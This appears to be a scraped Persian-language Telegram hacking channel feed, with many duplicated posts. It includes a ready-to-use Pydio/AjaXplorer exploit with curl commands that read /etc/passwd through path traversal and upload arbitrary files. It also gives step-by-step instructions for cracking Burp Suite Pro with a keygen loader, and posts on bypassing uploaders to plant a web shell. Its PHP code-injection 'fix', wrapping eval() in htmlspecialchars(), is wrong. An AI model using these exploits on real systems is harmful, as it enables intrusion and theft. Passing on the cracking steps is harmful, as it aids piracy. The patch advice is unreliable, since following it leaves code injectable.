☘️🍀🌱🌿🍃🌵
🌷🌹🥀🌺💐
🍂🍁💐🌾
🌸🌼🌻
💫⭐️
🔥
#سوپرایز #سوپرایز
همچنان که دوره های Hackertest.net
و تست نفوذ با DVWA در کانال ادامه دارد
سوپرایز ویژه ای هم در راه هست
😁
منتظر سوپرایزهای ویژه ای باشید.☢️
کانال مارو به دوستاتون معرفی کنید :
🆔 : @LearnExploit
🆔 : @IR0Day_Today
🔥
💫⭐️
🌸🌼🌻
🍂🍁💐🌾
🌷🌹🥀🌺💐
☘️🍀🌱🌿🍃🌵
🌷🌹🥀🌺💐
🍂🍁💐🌾
🌸🌼🌻
💫⭐️
🔥
#سوپرایز #سوپرایز
همچنان که دوره های Hackertest.net
و تست نفوذ با DVWA در کانال ادامه دارد
سوپرایز ویژه ای هم در راه هست
😁
منتظر سوپرایزهای ویژه ای باشید.☢️
کانال مارو به دوستاتون معرفی کنید :
🆔 : @LearnExploit
🆔 : @IR0Day_Today
🔥
💫⭐️
🌸🌼🌻
🍂🍁💐🌾
🌷🌹🥀🌺💐
☘️🍀🌱🌿🍃🌵
0Day.Today | Learn Exploit | Zero World | Dark web | pinned «☘️🍀🌱🌿🍃🌵 🌷🌹🥀🌺💐 🍂🍁💐🌾 🌸🌼🌻 💫⭐️ 🔥 #سوپرایز #سوپرایز همچنان که دوره های Hackertest.net و تست نفوذ با DVWA در کانال ادامه دارد سوپرایز ویژه ای هم در راه هست 😁 منتظر سوپرایزهای ویژه ای باشید.☢️ کانال مارو به دوستاتون معرفی کنید : 🆔 : @LearnExploit 🆔 : @IR0Day_Today…»
💻⌨️🖥
📲⌚️
📱
#Bypass #Uploader By Different #Method and Upload #Shell
————
سلام دوستان در خدمت شما هستیم با نحوه بایپس اپلودر ها با متد جدید :::
قابل توجه دوستان
در این فیلم که بر روی یکی از اپلودر ها تست میشود سعی بر این است که اپلودر را با استفاده از متد ها یا روش های زیر بایپس کنیم :
1 - اپلود فایل به صورت مستقیم
2 - اپلود فایل با تغییر نام (مانند :: PHP5 - Phtml - Php - PHp - PHP3 and ..)
3 - استفاده از Temper Data
که در هر سه حالت بالا اپلود نمیشه !
در این فیلم با یکی دیگر از متد های اپلود اشنا میشوید که میتونید روی اکثر اپلودر ها تست کنید و جواب بگیرید...
با تشکر.
⛓ برای اینکه سه روش قبلی رو یاد بگیرید روی اینجا کلیک کنید.
==============
@LearnExploit - 0DayBoy 's in Iran :)
📲⌚️
📱
#Bypass #Uploader By Different #Method and Upload #Shell
————
سلام دوستان در خدمت شما هستیم با نحوه بایپس اپلودر ها با متد جدید :::
قابل توجه دوستان
در این فیلم که بر روی یکی از اپلودر ها تست میشود سعی بر این است که اپلودر را با استفاده از متد ها یا روش های زیر بایپس کنیم :
1 - اپلود فایل به صورت مستقیم
2 - اپلود فایل با تغییر نام (مانند :: PHP5 - Phtml - Php - PHp - PHP3 and ..)
3 - استفاده از Temper Data
که در هر سه حالت بالا اپلود نمیشه !
در این فیلم با یکی دیگر از متد های اپلود اشنا میشوید که میتونید روی اکثر اپلودر ها تست کنید و جواب بگیرید...
با تشکر.
⛓ برای اینکه سه روش قبلی رو یاد بگیرید روی اینجا کلیک کنید.
==============
@LearnExploit - 0DayBoy 's in Iran :)
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
اموزش burpSuit برای دور زدن uploader ها
#Learning #BurpSuit on #Kalilinux (2018.2) for #Upladers #Bypassing
=====
@LearnExploit
--> 0Day.Today of TON
#Learning #BurpSuit on #Kalilinux (2018.2) for #Upladers #Bypassing
=====
@LearnExploit
--> 0Day.Today of TON
LeranExploit - File Upload Bypass.rar
25.7 MB
💻⌨️🖥
📲⌚️
📱
#Bypass #Uploader By Different #Method and Upload #Shell
————
سلام دوستان در خدمت شما هستیم با نحوه بایپس اپلودر ها با متد جدید :::
قابل توجه دوستان
در این فیلم که بر روی یکی از اپلودر ها تست میشود سعی بر این است که اپلودر را با استفاده از متد ها یا روش های زیر بایپس کنیم :
1 - اپلود فایل به صورت مستقیم
2 - اپلود فایل با تغییر نام (مانند :: PHP5 - Phtml - Php - PHp - PHP3 and ..)
3 - استفاده از Temper Data
که در هر سه حالت بالا اپلود نمیشه !
در این فیلم با یکی دیگر از متد های اپلود اشنا میشوید که میتونید روی اکثر اپلودر ها تست کنید و جواب بگیرید...
با تشکر.
⛓ برای اینکه سه روش قبلی رو یاد بگیرید روی اینجا کلیک کنید.
==============
@LearnExploit - 0DayBoy 's in Iran :)
📲⌚️
📱
#Bypass #Uploader By Different #Method and Upload #Shell
————
سلام دوستان در خدمت شما هستیم با نحوه بایپس اپلودر ها با متد جدید :::
قابل توجه دوستان
در این فیلم که بر روی یکی از اپلودر ها تست میشود سعی بر این است که اپلودر را با استفاده از متد ها یا روش های زیر بایپس کنیم :
1 - اپلود فایل به صورت مستقیم
2 - اپلود فایل با تغییر نام (مانند :: PHP5 - Phtml - Php - PHp - PHP3 and ..)
3 - استفاده از Temper Data
که در هر سه حالت بالا اپلود نمیشه !
در این فیلم با یکی دیگر از متد های اپلود اشنا میشوید که میتونید روی اکثر اپلودر ها تست کنید و جواب بگیرید...
با تشکر.
⛓ برای اینکه سه روش قبلی رو یاد بگیرید روی اینجا کلیک کنید.
==============
@LearnExploit - 0DayBoy 's in Iran :)
🔺🔻🔸🔹🔶🔷
🔳🔲▪️▫️◾️
⬜️⬛️◻️◼️
◽️♦️🗨
♠️♣️
✔️
#File #Upload #Vulnerability in #Pydio_AjaXplorer (Pydio/AjaXplorer) V 5.0.3 – 3.3.5
————————————-
#~Exploit Title : Unauthenticated Arbitrary File Upload Vulnerability In Pydio/AjaXplorer 5.0.3 – 3.3.5
آسیب پذیری فایل اپلود در (Pydio/AjaXplorer) ورژن 5.0.3 – 3.3.5
➖➖➖➖➖➖➖➖➖➖
#~Affected file :
فایل اسیب دیده : ( برای درک بهتر تصویر مطالعه شود !)
:::: `/plugins/editor.zoho/agent/save_zoho.php` ::::
<?php
$vars = array_merge($_GET, $_POST);
if(!isSet($vars["ajxp_action"]) && isset($vars["id"]) && isset($vars["format"])){
$filezoho = $_FILES['content']["tmp_name"];
$cleanId = str_replace(array("..", "/"), "", $vars["id"]);
move_uploaded_file($filezoho, "files/".$cleanId.".".$vars["format"]);
}else if($vars["ajxp_action"] == "get_file" && isSet($vars["name"])){
if(file_exists("files/".$vars["name"])){
readfile("files/".$vars["name"]);
unlink("files/".$vars["name"]);
}
}
?>
➖➖➖➖➖➖➖➖➖➖
#~Options :
گزینه ها :
option 1 :
اگر ajxp_action تنظیم (ست) نشده باشد، فایل content رو به قسمت files/id.format اپلود کنید.
در این مورد کد قبل از اینکه فرمت فایل ها رو چک کنه فایل رو به عنوان یک ارگومان به بخش move_uploded_file میده .
که این میتونه فرصتی برای اپلود فایل خودتون باشه...
نکته : برای اینکه توانایی موارد بالا رو داتشه باشید باید کاربر دسترسی لازم برای ادیت فایل رو داشته باشه.
option 2 :
اگر ajxp_action در بخش get_file تنظیم شده باشد (ست شده باشد)، شما میتوانید فایل رو از files/name بخوانید و بخش مد نظر رو حذف کنید !
که در این حالت دوباره کد نمیتونه پارامتر name رو تشخیص بده که این موردم میتونه باگ باشه.
➖➖➖➖➖➖➖➖➖➖
#~Filesdirectory's :
ادرس فایل :
ادرس پیشفرض فایل ها :
#~Read arbitrary files :
نحوه ی خواندن فایل :
curl "http://<url>/<ajaxplorer_wwwroot>/plugins/editor.zoho/agent/save_zoho.php?ajxp_action=get_file&name=<file_relative_path>"
مانند :
"http://muralito.el.payaso/ajaxplorer/plugins/editor.zoho/agent/save_zoho.php?ajxp_action=get_file&name=../../../../../../../../etc/passwd"
➖➖➖➖➖➖➖➖➖➖
#~Arbitrary File Upload :
نحوه ی اپلود فایل دلخواه :
curl -F 'content=@<filename_from_attacker_host>;type=<filetype>;filename=\"<filename>\"' "http://<url>/<ajaxplorer_wwwroot>/plugins/editor.zoho/agent/save_zoho.php?id=&format=<upload_to_file_relative_path>"
مانند :
curl -F 'content=@test.html;type=text/html;filename=\"test.html\"' "http://muralito.el.payaso/ajaxplorer/plugins/editor.zoho/agent/save_zoho.php?id=&format=./../../../data/files/test.html"
➖➖➖➖➖➖➖➖➖➖
با تشکر از همراهان عزیز.
Software link
Exploit link
————————————-
@LearnExploit - 0DayBoy 's in Iran :)
🔳🔲▪️▫️◾️
⬜️⬛️◻️◼️
◽️♦️🗨
♠️♣️
✔️
#File #Upload #Vulnerability in #Pydio_AjaXplorer (Pydio/AjaXplorer) V 5.0.3 – 3.3.5
————————————-
#~Exploit Title : Unauthenticated Arbitrary File Upload Vulnerability In Pydio/AjaXplorer 5.0.3 – 3.3.5
آسیب پذیری فایل اپلود در (Pydio/AjaXplorer) ورژن 5.0.3 – 3.3.5
➖➖➖➖➖➖➖➖➖➖
#~Affected file :
فایل اسیب دیده : ( برای درک بهتر تصویر مطالعه شود !)
:::: `/plugins/editor.zoho/agent/save_zoho.php` ::::
<?php
$vars = array_merge($_GET, $_POST);
if(!isSet($vars["ajxp_action"]) && isset($vars["id"]) && isset($vars["format"])){
$filezoho = $_FILES['content']["tmp_name"];
$cleanId = str_replace(array("..", "/"), "", $vars["id"]);
move_uploaded_file($filezoho, "files/".$cleanId.".".$vars["format"]);
}else if($vars["ajxp_action"] == "get_file" && isSet($vars["name"])){
if(file_exists("files/".$vars["name"])){
readfile("files/".$vars["name"]);
unlink("files/".$vars["name"]);
}
}
?>
➖➖➖➖➖➖➖➖➖➖
#~Options :
گزینه ها :
option 1 :
اگر ajxp_action تنظیم (ست) نشده باشد، فایل content رو به قسمت files/id.format اپلود کنید.
در این مورد کد قبل از اینکه فرمت فایل ها رو چک کنه فایل رو به عنوان یک ارگومان به بخش move_uploded_file میده .
که این میتونه فرصتی برای اپلود فایل خودتون باشه...
نکته : برای اینکه توانایی موارد بالا رو داتشه باشید باید کاربر دسترسی لازم برای ادیت فایل رو داشته باشه.
option 2 :
اگر ajxp_action در بخش get_file تنظیم شده باشد (ست شده باشد)، شما میتوانید فایل رو از files/name بخوانید و بخش مد نظر رو حذف کنید !
که در این حالت دوباره کد نمیتونه پارامتر name رو تشخیص بده که این موردم میتونه باگ باشه.
➖➖➖➖➖➖➖➖➖➖
#~Filesdirectory's :
ادرس فایل :
ادرس پیشفرض فایل ها :
/plugins/editor.zoho/agent/files
ادرس پیشفرض برای خواندن فایل های اپلود شده :/plugins/editor.zoho/data/files/
➖➖➖➖➖➖➖➖➖➖#~Read arbitrary files :
نحوه ی خواندن فایل :
curl "http://<url>/<ajaxplorer_wwwroot>/plugins/editor.zoho/agent/save_zoho.php?ajxp_action=get_file&name=<file_relative_path>"
مانند :
"http://muralito.el.payaso/ajaxplorer/plugins/editor.zoho/agent/save_zoho.php?ajxp_action=get_file&name=../../../../../../../../etc/passwd"
➖➖➖➖➖➖➖➖➖➖
#~Arbitrary File Upload :
نحوه ی اپلود فایل دلخواه :
curl -F 'content=@<filename_from_attacker_host>;type=<filetype>;filename=\"<filename>\"' "http://<url>/<ajaxplorer_wwwroot>/plugins/editor.zoho/agent/save_zoho.php?id=&format=<upload_to_file_relative_path>"
مانند :
curl -F 'content=@test.html;type=text/html;filename=\"test.html\"' "http://muralito.el.payaso/ajaxplorer/plugins/editor.zoho/agent/save_zoho.php?id=&format=./../../../data/files/test.html"
➖➖➖➖➖➖➖➖➖➖
با تشکر از همراهان عزیز.
Software link
Exploit link
————————————-
@LearnExploit - 0DayBoy 's in Iran :)
Telegram
AttachLearnExploit
🔰 #Install #BurpSuitePro V 1.7.35 (Burp Suite Pro v 1.7.35 ) On #Windows 10
➖➖➖➖➖➖➖➖➖➖
اموزش نحوه ی نصب Burp Suite Pro روی ویندوز 10 ::
(طبق توضیحات و عکس پیش برید دوستان )
➖➖➖➖➖➖➖➖➖➖
✅ #IR0Day.Today Boy's
🌐 T.me/LearnExploit
➖➖➖➖➖➖➖➖➖➖
اموزش نحوه ی نصب Burp Suite Pro روی ویندوز 10 ::
(طبق توضیحات و عکس پیش برید دوستان )
➖➖➖➖➖➖➖➖➖➖
✅ #IR0Day.Today Boy's
🌐 T.me/LearnExploit
@LearnExploit - Burp Suite Professional Edition v1.7.35.rar
26.1 MB
🔰 #Install #BurpSuitePro V 1.7.35 (Burp Suite Pro v 1.7.35 ) On #Windows 10
➖➖➖➖➖➖➖➖➖➖
BurpSuite Pro V 1.7.35
➖➖➖➖➖➖➖➖➖➖
✅ #IR0Day.Today Boy's
🌐 T.me/LearnExploit
➖➖➖➖➖➖➖➖➖➖
BurpSuite Pro V 1.7.35
➖➖➖➖➖➖➖➖➖➖
✅ #IR0Day.Today Boy's
🌐 T.me/LearnExploit
🔰 #Install #BurpSuitePro V 1.7.35 (Burp Suite Pro v 1.7.35 ) On #Windows 10
➖➖➖➖➖➖➖➖➖➖
مرحله ی 1 ::
بر روی Loader.jar بزنید و منتظر ران شدن برنامه باشید.
➖➖➖
⚠️ نکته خیلی مهم :
برای اینکه برنامه به درستی کار کنه باید نسخه java شما 8 باشه دوستان برای بدست اورد نسخه java از
java -version
در cmd میتوانید استفاده کنید.
برای دانلود java v 8 اینجا کلیک کنید.
➖➖➖
بعد از ران شدن برنامه طبق عکس لایسنس رو کپی کنید.
➖➖➖➖➖➖➖➖➖➖
✅ #IR0Day.Today Boy's
🌐 T.me/LearnExploit
➖➖➖➖➖➖➖➖➖➖
مرحله ی 1 ::
بر روی Loader.jar بزنید و منتظر ران شدن برنامه باشید.
➖➖➖
⚠️ نکته خیلی مهم :
برای اینکه برنامه به درستی کار کنه باید نسخه java شما 8 باشه دوستان برای بدست اورد نسخه java از
java -version
در cmd میتوانید استفاده کنید.
برای دانلود java v 8 اینجا کلیک کنید.
➖➖➖
بعد از ران شدن برنامه طبق عکس لایسنس رو کپی کنید.
➖➖➖➖➖➖➖➖➖➖
✅ #IR0Day.Today Boy's
🌐 T.me/LearnExploit
Telegram
AttachLearnExploit
🔰 #Install #BurpSuitePro V 1.7.35 (Burp Suite Pro v 1.7.35 ) On #Windows 10
➖➖➖➖➖➖➖➖➖➖
مرحله ی 2 :::
لایسنس رو در کادر کپی کنید با استفاده از کلید های ctrl + v و بعد بر روی next بزنید.
➖➖➖➖➖➖➖➖➖➖
✅ #IR0Day.Today Boy's
🌐 T.me/LearnExploit
➖➖➖➖➖➖➖➖➖➖
مرحله ی 2 :::
لایسنس رو در کادر کپی کنید با استفاده از کلید های ctrl + v و بعد بر روی next بزنید.
➖➖➖➖➖➖➖➖➖➖
✅ #IR0Day.Today Boy's
🌐 T.me/LearnExploit
Telegram
AttachLearnExploit
🔰 #Install #BurpSuitePro V 1.7.35 (Burp Suite Pro v 1.7.35 ) On #Windows 10
➖➖➖➖➖➖➖➖➖➖
مرحله ی 3 :::
بر روی manual activation کلیک کنید.
➖➖➖➖➖➖➖➖➖➖
✅ #IR0Day.Today Boy's
🌐 T.me/LearnExploit
➖➖➖➖➖➖➖➖➖➖
مرحله ی 3 :::
بر روی manual activation کلیک کنید.
➖➖➖➖➖➖➖➖➖➖
✅ #IR0Day.Today Boy's
🌐 T.me/LearnExploit
Telegram
AttachLearnExploit
🔰 #Install #BurpSuitePro V 1.7.35 (Burp Suite Pro v 1.7.35 ) On #Windows 10
➖➖➖➖➖➖➖➖➖➖
مرحله ی 4 :::
لایسنس کادر مشخص شده را کپی کنید. (با استفاده از کلید های ctrl +A و ctrl + C) یا با استفاده از copy request.
➖➖➖➖➖➖➖➖➖➖
✅ #IR0Day.Today Boy's
🌐 T.me/LearnExploit
➖➖➖➖➖➖➖➖➖➖
مرحله ی 4 :::
لایسنس کادر مشخص شده را کپی کنید. (با استفاده از کلید های ctrl +A و ctrl + C) یا با استفاده از copy request.
➖➖➖➖➖➖➖➖➖➖
✅ #IR0Day.Today Boy's
🌐 T.me/LearnExploit
Telegram
AttachLearnExploit
🔰 #Install #BurpSuitePro V 1.7.35 (Burp Suite Pro v 1.7.35 ) On #Windows 10
➖➖➖➖➖➖➖➖➖➖
مرحله ی 5 :::
لایسنس را در کادر مشخص شده paste کنید (ctrl + V).
➖➖➖➖➖➖➖➖➖➖
✅ #IR0Day.Today Boy's
🌐 T.me/LearnExploit
➖➖➖➖➖➖➖➖➖➖
مرحله ی 5 :::
لایسنس را در کادر مشخص شده paste کنید (ctrl + V).
➖➖➖➖➖➖➖➖➖➖
✅ #IR0Day.Today Boy's
🌐 T.me/LearnExploit
Telegram
AttachLearnExploit
🔰 #Install #BurpSuitePro V 1.7.35 (Burp Suite Pro v 1.7.35 ) On #Windows 10
➖➖➖➖➖➖➖➖➖➖
مرحله ی 6 :::
با انجام عملیان مرحله 5 محتویات کادر سوم ظاعر میشود.
لایسنس کادر مشخص شده را کپی کنید.
➖➖➖➖➖➖➖➖➖➖
✅ #IR0Day.Today Boy's
🌐 T.me/LearnExploit
➖➖➖➖➖➖➖➖➖➖
مرحله ی 6 :::
با انجام عملیان مرحله 5 محتویات کادر سوم ظاعر میشود.
لایسنس کادر مشخص شده را کپی کنید.
➖➖➖➖➖➖➖➖➖➖
✅ #IR0Day.Today Boy's
🌐 T.me/LearnExploit
Telegram
AttachLearnExploit
🔰 #Install #BurpSuitePro V 1.7.35 (Burp Suite Pro v 1.7.35 ) On #Windows 10
➖➖➖➖➖➖➖➖➖➖
مرحله ی 7 :::
محتویات کپی کرده را در بخش سوم وارد کنید. و سپس بر روی next کلیک کنید.
➖➖➖➖➖➖➖➖➖➖
✅ #IR0Day.Today Boy's
🌐 T.me/LearnExploit
➖➖➖➖➖➖➖➖➖➖
مرحله ی 7 :::
محتویات کپی کرده را در بخش سوم وارد کنید. و سپس بر روی next کلیک کنید.
➖➖➖➖➖➖➖➖➖➖
✅ #IR0Day.Today Boy's
🌐 T.me/LearnExploit
Telegram
AttachLearnExploit
🔰 #Install #BurpSuitePro V 1.7.35 (Burp Suite Pro v 1.7.35 ) On #Windows 10
➖➖➖➖➖➖➖➖➖➖
مرحله ی 8 :::
عملیات با موفقیت به پایان رسید و برنامه کرک شد.
برای اجرای دوباره ی برنامه لازمه که شما دوباره Loader.jar را ران کنید و سپس بر روی Run بزنید. (اگر برنامه را به درستی کرک کردید BurpSuite Pro اجرا مشود.)
با تشکر.
➖➖➖➖➖➖➖➖➖➖
✅ #IR0Day.Today Boy's
🌐 T.me/LearnExploit
➖➖➖➖➖➖➖➖➖➖
مرحله ی 8 :::
عملیات با موفقیت به پایان رسید و برنامه کرک شد.
برای اجرای دوباره ی برنامه لازمه که شما دوباره Loader.jar را ران کنید و سپس بر روی Run بزنید. (اگر برنامه را به درستی کرک کردید BurpSuite Pro اجرا مشود.)
با تشکر.
➖➖➖➖➖➖➖➖➖➖
✅ #IR0Day.Today Boy's
🌐 T.me/LearnExploit
Telegram
AttachLearnExploit
#Pentesting Dvwa
#Part_2 (2)
#Level : #Low
#BruteForce_Attacks
BruteForce Attacks
————————————
⭕️ دوره ی تست نفوذ باگ ها با برنامه DVWA
⭕️ اشنایی و نحوه ی انجام حملات Brute Force :
⭕️ جلسه ی : 2
⭕️ سطح : آسان
————————————
@ t.me/LearnExploit
@ IR0Day.Today Boy's
#Part_2 (2)
#Level : #Low
#BruteForce_Attacks
BruteForce Attacks
————————————
⭕️ دوره ی تست نفوذ باگ ها با برنامه DVWA
⭕️ اشنایی و نحوه ی انجام حملات Brute Force :
⭕️ جلسه ی : 2
⭕️ سطح : آسان
————————————
@ t.me/LearnExploit
@ IR0Day.Today Boy's
Pentesting With DVWA Part 2.rar
35.2 MB
#Pentesting Dvwa
#Part_2 (2)
#Level : #Low
#BruteForce_Attacks
BruteForce Attacks
————————————
⭕️ دوره ی تست نفوذ باگ ها با برنامه DVWA
⭕️ اشنایی و نحوه ی انجام حملات Brute Force :
⭕️ جلسه ی : 2
⭕️ سطح : آسان
————————————
@ t.me/LearnExploit
@ IR0Day.Today Boy's
#Part_2 (2)
#Level : #Low
#BruteForce_Attacks
BruteForce Attacks
————————————
⭕️ دوره ی تست نفوذ باگ ها با برنامه DVWA
⭕️ اشنایی و نحوه ی انجام حملات Brute Force :
⭕️ جلسه ی : 2
⭕️ سطح : آسان
————————————
@ t.me/LearnExploit
@ IR0Day.Today Boy's
🔰#PCI Php Code Injection #Vulnerable
➖➖➖➖➖➖➖➖➖➖
❇️ سلام خدمت دوستان و همراهان عزیز ❇️
🔆 در این ویدئو که برای شما اماده شده به نحوه ی استفاده از Php Code Injection در سه سطح :
(Levels = Low, Medium, High)
بیان شده است.
نحوه ی fix یا Patch باگ : پست بعدی
امیدبران است که مفید واقع شده باشد.
➖➖➖➖➖➖➖➖➖➖
⚜️ linux@0day:~#./@LearnExploit
⚜️ IR0Day.Today Boy's
➖➖➖➖➖➖➖➖➖➖
❇️ سلام خدمت دوستان و همراهان عزیز ❇️
🔆 در این ویدئو که برای شما اماده شده به نحوه ی استفاده از Php Code Injection در سه سطح :
(Levels = Low, Medium, High)
بیان شده است.
نحوه ی fix یا Patch باگ : پست بعدی
امیدبران است که مفید واقع شده باشد.
➖➖➖➖➖➖➖➖➖➖
⚜️ linux@0day:~#./@LearnExploit
⚜️ IR0Day.Today Boy's
php injection bug.rar
13.5 MB
🔰#PCI Php Code Injection #Vulnerable
➖➖➖➖➖➖➖➖➖➖
❇️ سلام خدمت دوستان و همراهان عزیز ❇️
🔆 در این ویدئو که برای شما اماده شده به نحوه ی استفاده از Php Code Injection در سه سطح :
(Levels = Low, Medium, High)
بیان شده است.
نحوه ی fix یا Patch باگ : پست بعدی
امیدبران است که مفید واقع شده باشد.
➖➖➖➖➖➖➖➖➖➖
⚜️ linux@0day:~#./@LearnExploit
⚜️ IR0Day.Today Boy's
➖➖➖➖➖➖➖➖➖➖
❇️ سلام خدمت دوستان و همراهان عزیز ❇️
🔆 در این ویدئو که برای شما اماده شده به نحوه ی استفاده از Php Code Injection در سه سطح :
(Levels = Low, Medium, High)
بیان شده است.
نحوه ی fix یا Patch باگ : پست بعدی
امیدبران است که مفید واقع شده باشد.
➖➖➖➖➖➖➖➖➖➖
⚜️ linux@0day:~#./@LearnExploit
⚜️ IR0Day.Today Boy's
🔰#PCI Php Code Injection #Vulnerable #Ptchor #Fix
➖➖➖➖➖➖➖➖➖➖
❇️ نحوه ی **Fix** یا **Patch** باگ ❇️
این اسیب پذیری در موقعی رخ میدهد که یک برنامه نویسی از تابع
[localhost]//index.php?Amir=1
برای اینکه امکان inject کردن کد های php نباشد شما میتوانید
از توابع زیر استفاده کنید :
▪️mysql_real_escape_string()
▪️htmlentities()
▪️htmlspecialchars()
▪️strip_tags()
▪️addslashes()
نحوه ی استفاده از اونا به برنامه نویس بستگی داره که معمولا به صورت :
باتشکر
➖➖➖➖➖➖➖➖➖➖
⚜️ linux@0day:~#./@LearnExploit
⚜️ IR0Day.Today Boy's
➖➖➖➖➖➖➖➖➖➖
❇️ نحوه ی **Fix** یا **Patch** باگ ❇️
این اسیب پذیری در موقعی رخ میدهد که یک برنامه نویسی از تابع
eval();
در php استفاده کند. مانند نمونه کد زیر : $myvar = "varname";
$x = $_GET['Amir'];
eval("\$myvar = \$x;");
بازتاب ان در سایت : [localhost]//index.php?Amir=1
برای اینکه امکان inject کردن کد های php نباشد شما میتوانید
از توابع زیر استفاده کنید :
▪️mysql_real_escape_string()
▪️htmlentities()
▪️htmlspecialchars()
▪️strip_tags()
▪️addslashes()
نحوه ی استفاده از اونا به برنامه نویس بستگی داره که معمولا به صورت :
eval(htmlspecialchars("\$myvar = \$x;"));
میباشد.باتشکر
➖➖➖➖➖➖➖➖➖➖
⚜️ linux@0day:~#./@LearnExploit
⚜️ IR0Day.Today Boy's
Telegram
AttachLearnExploit
👍1